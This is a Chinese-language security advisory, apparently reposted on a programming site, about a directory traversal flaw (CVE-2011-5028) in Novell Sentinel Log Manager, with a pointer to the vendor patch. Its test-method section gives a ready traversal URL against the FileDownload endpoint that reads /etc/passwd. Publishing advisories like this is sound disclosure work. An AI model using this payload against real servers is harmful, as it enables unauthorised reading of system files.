发布日期:2011-12-18
更新日期:2012-02-10受影响系统:
Novell Sentinel Log Manager
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51104
CVE ID: CVE-2011-5028Novell Sentinel Log Manager是一个日志管理软件。Sentinel Log Manager在实现上存在目录遍历漏洞,成功利用后可允许攻击者获取敏感信息。<*来源:Andrea Fabrizi (andrea.fabrizi@gmail.com)
*>测试方法:
--------------------------------------------------------------------------------
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rdparty/tomcat/temp/../../../../../../etc/passwd建议:
--------------------------------------------------------------------------------
厂商补丁:Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://support.novell.com/security-alertsApache MyFaces “ln”参数信息泄露漏洞OpenSSL ECDSA定时攻击本地信息泄露漏洞相关资讯 Novell
- Novell Groupwise Client地址簿解 (03/03/2012 08:12:38)
- Novell GroupWise Messenger " (02/21/2012 20:05:42)
- Novell国内战果累累 酝酿未来云市 (02/14/2012 06:32:49)
| - Novell张先民:加大云投入 Linux产 (02/27/2012 10:38:24)
- Novell GroupWise Messenger “NM_ (02/21/2012 20:01:45)
- Novell iPrint Server “ (02/07/2012 18:31:39)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的
|
易网时代-编程资源站